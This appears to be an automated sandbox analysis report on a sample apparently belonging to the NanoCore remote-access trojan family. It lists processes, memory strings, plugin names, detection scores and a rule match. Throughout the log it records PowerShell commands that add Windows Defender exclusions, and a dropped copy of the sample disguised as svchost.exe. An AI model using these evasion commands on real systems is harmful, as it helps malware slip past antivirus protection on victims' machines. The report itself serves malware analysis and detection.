    Source: C:\Users\Public\Documents\???????????????\svchost.exe, type: DROPPEDMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4588 -ip 4588
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeCode function: 7_2_002D2C15
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeCode function: 8_2_00072C15
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeCode function: 9_2_00C02C15
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeCode function: 9_2_0301E471
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeCode function: 9_2_0301E480
    Source: C:\Users\Public\Documents\???????????????\svchost.exeCode function: 13_2_001D2C15
    Source: C:\Users\Public\Documents\???????????????\svchost.exeCode function: 15_2_00C52C15
    Source: p9Ts9VV2NZ.exe, 00000000.00000000.341425610.0000000003531000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAlienRunPE.exe6 vs p9Ts9VV2NZ.exe
    Source: p9Ts9VV2NZ.exe, 00000000.00000000.354484240.0000000004271000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCWYV TXB.exe2 vs p9Ts9VV2NZ.exe
    Source: p9Ts9VV2NZ.exe, 00000000.00000000.317635734.0000000000577000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs p9Ts9VV2NZ.exe
    Source: p9Ts9VV2NZ.exe, 00000000.00000000.317513562.00000000001E6000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameFunctionPlotter.exe@ vs p9Ts9VV2NZ.exe
    Source: p9Ts9VV2NZ.exe, 00000007.00000000.310418530.00000000002D6000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameFunctionPlotter.exe@ vs p9Ts9VV2NZ.exe
    Source: p9Ts9VV2NZ.exe, 00000008.00000000.312460032.0000000000076000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameFunctionPlotter.exe@ vs p9Ts9VV2NZ.exe
    Source: p9Ts9VV2NZ.exe, 00000009.00000002.563022898.0000000003041000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameClientPlugin.dll4 vs p9Ts9VV2NZ.exe
    Source: p9Ts9VV2NZ.exe, 00000009.00000002.576136688.0000000006160000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameLzma#.dll4 vs p9Ts9VV2NZ.exe
    Source: p9Ts9VV2NZ.exe, 00000009.00000002.576136688.0000000006160000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameSurveillanceExClientPlugin.dll4 vs p9Ts9VV2NZ.exe
    Source: p9Ts9VV2NZ.exe, 00000009.00000002.565058267.0000000004928000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCoreClientPlugin.dll8 vs p9Ts9VV2NZ.exe
    Source: p9Ts9VV2NZ.exe, 00000009.00000002.565058267.0000000004928000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameManagementClientPlugin.dll4 vs p9Ts9VV2NZ.exe
    Source: p9Ts9VV2NZ.exe, 00000009.00000002.565058267.0000000004928000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameNanoCoreBase.dll< vs p9Ts9VV2NZ.exe
    Source: p9Ts9VV2NZ.exe, 00000009.00000002.565058267.0000000004928000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMyClientPluginNew.dll4 vs p9Ts9VV2NZ.exe
    Source: p9Ts9VV2NZ.exe, 00000009.00000002.565058267.0000000004928000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMyClientPlugin.dll4 vs p9Ts9VV2NZ.exe
    Source: p9Ts9VV2NZ.exe, 00000009.00000002.565058267.0000000004928000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameFileBrowserClient.dllT vs p9Ts9VV2NZ.exe
    Source: p9Ts9VV2NZ.exe, 00000009.00000002.565058267.0000000004928000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMyClientPlugin.dll@ vs p9Ts9VV2NZ.exe
    Source: p9Ts9VV2NZ.exe, 00000009.00000002.565058267.0000000004928000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameClientTest.dll6 vs p9Ts9VV2NZ.exe
    Source: p9Ts9VV2NZ.exe, 00000009.00000002.565058267.0000000004928000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameNetworkClientPlugin.dll4 vs p9Ts9VV2NZ.exe
    Source: p9Ts9VV2NZ.exe, 00000009.00000002.565058267.0000000004928000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSecurityClientPlugin.dll4 vs p9Ts9VV2NZ.exe
    Source: p9Ts9VV2NZ.exe, 00000009.00000002.565058267.0000000004928000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAForge.Video.DirectShow.dll4 vs p9Ts9VV2NZ.exe
    Source: p9Ts9VV2NZ.exe, 00000009.00000002.565058267.0000000004928000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameNAudio.dll4 vs p9Ts9VV2NZ.exe
    Source: p9Ts9VV2NZ.exe, 00000009.00000002.565058267.0000000004928000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSurveillanceClientPlugin.dll4 vs p9Ts9VV2NZ.exe
    Source: p9Ts9VV2NZ.exe, 00000009.00000002.565058267.0000000004928000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameToolsClientPlugin.dll4 vs p9Ts9VV2NZ.exe
    Source: p9Ts9VV2NZ.exe, 00000009.00000002.558240752.0000000000C06000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameFunctionPlotter.exe@ vs p9Ts9VV2NZ.exe
    Source: p9Ts9VV2NZ.exeVirustotal: Detection: 62%
    Source: p9Ts9VV2NZ.exeMetadefender: Detection: 22%
    Source: p9Ts9VV2NZ.exeReversingLabs: Detection: 78%
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeFile read: C:\Users\user\Desktop\p9Ts9VV2NZ.exeJump to behavior
    Source: p9Ts9VV2NZ.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: unknownProcess created: C:\Users\user\Desktop\p9Ts9VV2NZ.exe 'C:\Users\user\Desktop\p9Ts9VV2NZ.exe'
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\p9Ts9VV2NZ.exe' -Force
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess created: C:\Users\user\Desktop\p9Ts9VV2NZ.exe C:\Users\user\Desktop\p9Ts9VV2NZ.exe
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess created: C:\Users\user\Desktop\p9Ts9VV2NZ.exe C:\Users\user\Desktop\p9Ts9VV2NZ.exe
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess created: C:\Users\user\Desktop\p9Ts9VV2NZ.exe C:\Users\user\Desktop\p9Ts9VV2NZ.exe
    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4588 -ip 4588
    Source: unknownProcess created: C:\Users\Public\Documents\???????????????\svchost.exe 'C:\Users\Public\Documents\???????????????\svchost.exe'
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4588 -s 2636
    Source: unknownProcess created: C:\Users\Public\Documents\???????????????\svchost.exe 'C:\Users\Public\Documents\???????????????\svchost.exe'
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 6568 -ip 6568
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6568 -s 2604
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 6828 -ip 6828
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6828 -s 2096
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\p9Ts9VV2NZ.exe' -Force
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess created: C:\Users\user\Desktop\p9Ts9VV2NZ.exe C:\Users\user\Desktop\p9Ts9VV2NZ.exe
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess created: C:\Users\user\Desktop\p9Ts9VV2NZ.exe C:\Users\user\Desktop\p9Ts9VV2NZ.exe
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess created: C:\Users\user\Desktop\p9Ts9VV2NZ.exe C:\Users\user\Desktop\p9Ts9VV2NZ.exe
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4588 -s 2636
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4588 -ip 4588
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 6568 -ip 6568
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 6828 -ip 6828
    Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6568 -s 2604
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6828 -s 2096
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeFile created: C:\Users\Public\Documents\???????????????Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pc04nqq2.yth.ps1Jump to behavior
    Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@58/26@17/4
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
    Source: C:\Users\Public\Documents\???????????????\svchost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
    Source: C:\Users\Public\Documents\???????????????\svchost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
    Source: p9Ts9VV2NZ.exeJoe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{453aeca4-8168-43fd-806a-925b22b64441}
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5808:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4488:120:WilError_01
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4588
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1228:120:WilError_01
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Users\Public\Documents\???????????????\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
    Source: C:\Users\Public\Documents\???????????????\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
    Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
    Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
    Source: C:\Users\Public\Documents\???????????????\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
    Source: C:\Users\Public\Documents\???????????????\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
    Source: p9Ts9VV2NZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
    Source: p9Ts9VV2NZ.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
    Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: p9Ts9VV2NZ.exe, 00000000.00000000.319928127.00000000008B7000.00000004.00000020.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb source: svchost.exe, 0000000D.00000000.435057111.0000000006418000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000000.441310771.0000000006E00000.00000004.00000001.sdmp
    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: p9Ts9VV2NZ.exe, 00000000.00000000.319523647.0000000000884000.00000004.00000020.sdmp
    Source: Binary string: V3D9svchost.PDB source: svchost.exe, 0000000D.00000000.391536550.0000000000567000.00000004.00000001.sdmp
    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbX4y~ source: p9Ts9VV2NZ.exe, 00000000.00000000.319523647.0000000000884000.00000004.00000020.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb8 source: p9Ts9VV2NZ.exe, 00000000.00000000.359350657.0000000006D40000.00000004.00000001.sdmp
    Source: Binary string: mscorlib.pdbq source: p9Ts9VV2NZ.exe, 00000000.00000000.359350657.0000000006D40000.00000004.00000001.sdmp
    Source: Binary string: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini\??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: svchost.exe, 0000000F.00000000.441350705.0000000006E11000.00000004.00000001.sdmp
    Source: Binary string: C:\Windows\System.Core.pdbpdbore.pdb* source: p9Ts9VV2NZ.exe, 00000000.00000000.359350657.0000000006D40000.00000004.00000001.sdmp
    Source: Binary string: W.pdb% source: p9Ts9VV2NZ.exe, 00000000.00000000.317635734.0000000000577000.00000004.00000001.sdmp
    Source: Binary string: C:\Windows\System.Core.pdbpdbore.pdb source: svchost.exe, 0000000D.00000000.435057111.0000000006418000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000000.441350705.0000000006E11000.00000004.00000001.sdmp
    Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: p9Ts9VV2NZ.exe, 00000009.00000002.565058267.0000000004928000.00000004.00000001.sdmp
    Source: Binary string: C:\Users\Daan\source\repos\NanoExploit\ClientTest\obj\Debug\ClientTest.pdbS.m. _._CorDllMainmscoree.dll source: p9Ts9VV2NZ.exe, 00000009.00000002.565058267.0000000004928000.00000004.00000001.sdmp
    Source: Binary string: System.Core.pdb. source: p9Ts9VV2NZ.exe, 00000000.00000000.359350657.0000000006D40000.00000004.00000001.sdmp
    Source: Binary string: Wnpdie.pdb source: p9Ts9VV2NZ.exe, 00000000.00000000.317635734.0000000000577000.00000004.00000001.sdmp
    Source: Binary string: KL\svchost.PDB source: svchost.exe, 0000000D.00000000.391536550.0000000000567000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000000.464057620.0000000006E19000.00000004.00000001.sdmp
    Source: Binary string: \??\C:\Windows\dll\System.Core.pdbjkk source: p9Ts9VV2NZ.exe, 00000000.00000000.319928127.00000000008B7000.00000004.00000020.sdmp
    Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: p9Ts9VV2NZ.exe, 00000009.00000002.565058267.0000000004928000.00000004.00000001.sdmp
    Source: Binary string: \??\C:\Windows\mscorlib.pdb source: p9Ts9VV2NZ.exe, 00000000.00000000.359470242.0000000006D6B000.00000004.00000001.sdmp
    Source: Binary string: Vnpdie.pdb source: svchost.exe, 0000000D.00000000.391536550.0000000000567000.00000004.00000001.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbl source: svchost.exe, 0000000F.00000002.560950517.00000000014DC000.00000004.00000001.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\System.pdba source: svchost.exe, 0000000F.00000000.464035689.0000000006E11000.00000004.00000001.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: svchost.exe, 0000000D.00000000.435057111.0000000006418000.00000004.00000001.sdmp
    Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: p9Ts9VV2NZ.exe, 00000009.00000002.565058267.0000000004928000.00000004.00000001.sdmp
    Source: Binary string: C:\Users\user\Desktop\p9Ts9VV2NZ.PDB source: p9Ts9VV2NZ.exe, 00000000.00000000.317635734.0000000000577000.00000004.00000001.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll\??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb^C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.dllAdd-MpPreference -ExclusionPath "C:\Users\Public\Documents\ source: svchost.exe, 0000000F.00000000.464074889.0000000006E1F000.00000004.00000001.sdmp
    Source: Binary string: mscorlib.pdb7 source: svchost.exe, 0000000F.00000002.560950517.00000000014DC000.00000004.00000001.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: p9Ts9VV2NZ.exe, 00000000.00000000.359271665.0000000006D30000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000000.441350705.0000000006E11000.00000004.00000001.sdmp
    Source: Binary string: npdie.pdb source: svchost.exe, 0000000F.00000000.422620669.0000000000DE7000.00000004.00000001.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb*6 source: p9Ts9VV2NZ.exe, 00000000.00000000.359350657.0000000006D40000.00000004.00000001.sdmp
    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb\??\C:\Windows\dll\System.pdb source: svchost.exe, 0000000F.00000002.560950517.00000000014DC000.00000004.00000001.sdmp
    Source: Binary string: \??\C:\Windows\System.pdb source: svchost.exe, 0000000D.00000000.456731946.0000000006435000.00000004.00000001.sdmp
    Source: Binary string: \??\C:\Windows\System.Core.pdb44 source: p9Ts9VV2NZ.exe, 00000000.00000000.319523647.0000000000884000.00000004.00000020.sdmp
    Source: Binary string: C:\Windows\System.pdbpdbtem.pdb* source: svchost.exe, 0000000F.00000000.441310771.0000000006E00000.00000004.00000001.sdmp
    Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: p9Ts9VV2NZ.exe, 00000009.00000002.565058267.0000000004928000.00000004.00000001.sdmp
    Source: Binary string: \??\C:\Users\user\Desktop\p9Ts9VV2NZ.PDB source: p9Ts9VV2NZ.exe, 00000000.00000000.359350657.0000000006D40000.00000004.00000001.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: p9Ts9VV2NZ.exe, 00000000.00000000.359222843.0000000006CE0000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000002.560950517.00000000014DC000.00000004.00000001.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: p9Ts9VV2NZ.exe, 00000000.00000000.359271665.0000000006D30000.00000004.00000001.sdmp
    Source: Binary string: mscorlib.pdb source: svchost.exe, 0000000F.00000000.441486096.0000000006E29000.00000004.00000001.sdmp
